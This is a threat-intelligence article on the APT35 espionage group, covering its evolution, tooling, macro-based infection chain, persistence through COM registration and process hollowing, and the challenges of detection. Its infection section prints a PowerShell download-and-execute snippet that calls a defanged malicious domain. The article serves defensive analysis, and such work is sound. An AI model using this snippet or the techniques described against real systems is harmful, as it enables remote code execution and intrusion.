Since surfacing in the mid-2010s as a persistent threat actor, the IRGC-linked APT35 collective has continually adapted its methods to target government agencies, energy companies, and diplomatic missions across the Middle East and beyond. What began as credential-harvesting phishing campaigns has matured into a modular, multi-stage toolkit that supports deep network infiltration and prolonged espionage.
Background and Evolution
Initially, APT35 focused on spear-phishing to capture credentials by exploiting victims who opened malicious Office documents. Over time, the group expanded its capabilities to include custom implants and the reuse of public tooling, producing a mixed toolset that leaves identifiable code fingerprints even when payloads change.
Cloudsek researchers also noted a link between the group’s adoption of .NET-based implants and a shift toward in-memory execution techniques, which reduce disk footprints and complicate forensic recovery, this observation follows the earlier analysis and influenced defensive rule development for network defenders.
Toolset and Tradecraft
APT35 combines bespoke malware with off-the-shelf components, allowing operators to pivot between payloads while retaining unique artefacts that analysts can track. Common tradecraft elements include randomized command-and-control beaconing intervals, encrypted channels tunneled over HTTP or HTTPS, and techniques designed to minimize on-disk traces, such as process injection and in-memory loaders.
Beyond malware, the group relies heavily on open-source intelligence, crafting tailored lures that exploit regional geopolitics and professional relationships to increase the likelihood of victim interaction. This human-focused preparation, paired with technical sophistication, increases success rates and extends dwell time inside compromised networks.
Infection Mechanism, Deep Dive
APT35 often begins with a weaponized Word document that contains obfuscated VBA macros, the macros are designed to load a staged downloader directly into memory. When the user opens the document, the macro runs a PowerShell command that impersonates a legitimate Windows Update process, downloading and executing the next-stage payload.
Example macro behavior, presented for analyst review and reproduction in defensive labs, looks like this, use caution if testing in an isolated environment:
$u = "http://malicious[.]domain/payload.bin"
$r = Invoke-WebRequest -Uri $u -UseBasicParsing
$e = [System.Text.Encoding]::UTF8.GetString($r.Content)
Invoke-Expression $eThe staged downloader then decrypts a DLL using an AES key embedded in the VBA, the decrypted component, frequently a .NET backdoor referred to as PhosphorusLoader, registers as a COM object to achieve persistence. Operators use process hollowing to inject the implant into svchost.exe, and the implant intermittently beacons to a concealed C2 domain. See Figure 1 for the injection workflow, note that the AES key is commonly stored in an encrypted resource to hinder detection.
Operational Impact and Detection Challenges
Compromised networks have experienced exfiltration of diplomatic communications, theft of intellectual property, and strategic reconnaissance aligned with state-level objectives. APT35’s operational security measures often foil signature-based defenses, and victims can remain unaware of intrusions for months, enabling extensive lateral movement and data collection.
Because the group blends human-focused social engineering with evasive execution techniques, defenders need layered detection strategies, including behavior-based telemetry, memory-analysis capabilities, and custom rules tuned to reveal irregular beaconing and suspicious COM registration patterns.
